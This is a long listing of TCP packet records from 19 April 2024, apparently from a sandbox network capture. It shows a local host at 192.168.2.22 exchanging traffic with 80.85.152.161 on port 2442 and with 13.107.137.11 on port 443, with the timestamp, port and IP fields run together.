                                                                                                                                                  Apr 19, 2024 16:17:15.505373001 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.505450010 CEST491762442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:15.506027937 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.506109953 CEST491762442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:15.507041931 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.507093906 CEST491762442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:15.507433891 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.507514000 CEST491762442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:15.509207010 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.509321928 CEST491762442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:15.510562897 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.510622025 CEST491762442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:15.510946035 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.511003971 CEST491762442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:15.512046099 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.512139082 CEST491762442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:15.689577103 CEST49178443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:17:15.689609051 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.689671040 CEST49178443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:17:15.698216915 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.698369980 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.698379993 CEST491762442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:15.698448896 CEST491762442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:15.700125933 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.700726032 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.702229977 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.741921902 CEST49178443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:17:15.741992950 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.748770952 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.748904943 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.750000000 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.750710011 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.751450062 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.752778053 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.753391981 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.753705025 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.754798889 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.755517960 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.756243944 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.756956100 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.758337975 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.759147882 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.759347916 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.760454893 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.761814117 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.762588024 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.764658928 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.765351057 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.766169071 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.766793966 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.767471075 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.768174887 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.944729090 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.945313931 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:15.946314096 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:16.074595928 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:16.107434034 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:16.107516050 CEST49178443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:17:16.113322020 CEST49178443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:17:16.113331079 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:16.113584995 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:16.195849895 CEST49178443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:17:16.240113974 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:16.314419985 CEST491762442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:16.560360909 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:16.776998997 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:16.777081013 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:16.777132034 CEST49178443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:17:16.778559923 CEST49178443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:17:16.813623905 CEST491762442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:16.940213919 CEST49179443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:17:16.940258026 CEST4434917913.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:16.940311909 CEST49179443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:17:16.944787025 CEST49179443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:17:16.944811106 CEST4434917913.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:17.317498922 CEST4434917913.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:17.317612886 CEST49179443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:17:17.339787006 CEST49179443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:17:17.339808941 CEST4434917913.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:17.340411901 CEST4434917913.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:17.548171043 CEST4434917913.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:17.548243999 CEST49179443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:17:17.576564074 CEST49179443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:17:17.624116898 CEST4434917913.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:18.292599916 CEST4434917913.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:18.292881012 CEST4434917913.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:18.292941093 CEST49179443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:17:18.294233084 CEST49179443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:17:21.545514107 CEST491762442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:21.624376059 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:21.791708946 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:21.791765928 CEST24424917680.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:21.791891098 CEST491762442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:21.886964083 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:21.887044907 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:26.909671068 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:27.223794937 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:27.223992109 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:27.505490065 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:27.505582094 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:27.505635023 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:27.505646944 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:27.505711079 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:27.505748034 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:27.768389940 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:27.768450975 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:27.768534899 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:27.768542051 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:27.768573999 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:27.768610954 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:27.768610954 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:27.768651962 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:27.768688917 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:27.768688917 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:27.983258009 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.031222105 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.031277895 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.031332016 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.031394005 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.031431913 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.031470060 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.031475067 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.031506062 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.031543970 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.031550884 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.031579971 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.031618118 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.031622887 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.031703949 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.031743050 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.031748056 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.031781912 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.031824112 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.247385979 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.247437000 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.247488976 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.295104027 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295165062 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295203924 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295239925 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295272112 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.295279026 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295309067 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.295316935 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295353889 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295357943 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.295391083 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295427084 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295439959 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.295475960 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295511961 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295521975 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.295551062 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295588017 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295599937 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.295624971 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295660973 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295669079 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.295698881 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295734882 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295747042 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.295772076 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295809984 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295815945 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.295847893 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295885086 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295896053 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.295922041 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295958996 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.295964956 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.295999050 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.296049118 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.510130882 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.510195971 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.510237932 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.510266066 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.510277033 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.510324001 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.558458090 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.558496952 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.558537006 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.558553934 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.558662891 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.558700085 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.558706999 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.558737040 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.558773994 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.558784008 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.558809996 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.558846951 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.558881998 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.558883905 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.558921099 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.558926105 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.558959007 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559000969 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559005976 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.559042931 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559087038 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.559097052 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559134007 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559169054 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559176922 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.559207916 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559243917 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559257984 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.559281111 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559317112 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559323072 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.559353113 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559391022 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559393883 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.559427023 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559463978 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559470892 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.559501886 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559537888 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559542894 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.559575081 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559612989 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559618950 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.559649944 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559684992 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559689999 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.559721947 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559758902 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559760094 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.559794903 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559832096 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559839010 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.559869051 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559906006 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559910059 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.559942007 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559978962 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.559987068 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.560017109 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.560053110 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.560084105 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.560089111 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.560132980 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.560143948 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.560179949 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.560216904 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.560225010 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.560255051 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.560292006 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.560309887 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.560328960 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.560375929 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.774477959 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.774535894 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.774575949 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.774584055 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.774614096 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.774652958 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.774655104 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.774691105 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.774729013 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.774730921 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.774769068 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.774811029 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.821235895 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.821573973 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.821614981 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.821619034 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.821655989 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.821696043 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.823260069 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.823431015 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.823467970 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.823471069 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.823508024 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.823544025 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.823546886 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.823581934 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.823621035 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.823625088 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.823657990 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.823693991 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.823694944 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.823730946 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.823767900 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.823769093 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.823806047 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.823843002 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.823844910 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.823880911 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.823919058 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.823924065 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.823956013 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.823996067 CEST24424918280.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:17:28.824003935 CEST491822442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:17:28.824034929 CEST24424918280.85.152.161192.168.2.22
